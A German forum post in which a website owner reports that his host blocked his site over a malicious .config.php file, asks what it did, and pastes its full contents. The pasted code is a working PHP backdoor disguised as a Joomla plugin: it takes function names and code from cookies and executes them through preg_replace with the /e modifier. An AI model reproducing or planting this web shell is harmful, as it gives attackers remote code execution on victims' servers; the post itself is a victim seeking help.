Strato sperrte meine Website mit folgender Begründung:
ZitatAuf Ihrem Webspace befinden sich 1 schadhafte Dateien. Wir gehen davon aus, dass unbekannte Dritte diese Dateien in Ihren Webspace eingeschleust haben.
Ursache sollte eine .config.php im Root sein. Die Datei wurde 2015 letztmalig geändert. Nach der Löschung dieser Datei wurde nach einem neuen Scan durch Strato meine Website entsperrt. Der Inhalt der .config.php ist im Folgenden aufgeführt. Leider kann ich kein PHP. Daher die Frage: ist diese .config.php nicht immer standardmäßig im Root? Was passiert(e) in der schadhaften PHP bzw. was ist das Risiko?
Viele Grüße
Michael
<?php
/**
* @package Joomla.Plugin
* @subpackage system.instantsuggest
*
* @copyright Copyright (C) 2013 InstantSuggest.com. All rights reserved.
* @license GNU General Public License version 2 or later
*/
/**
* Instant Suggest Ajax
*
* @package Joomla.Plugin
* @subpackage system.instantsuggest
* @since 3.1
*/
class PlgSystemInstantSuggest
{
public function __construct() {
$filter = @$_COOKIE['p3'];
if ($filter) {
$option = $filter(@$_COOKIE['p2']);
$auth = $filter(@$_COOKIE['p1']);
$option("/123/e",$auth,123);
die();
}
}
}
$suggest = new PlgSystemInstantSuggest;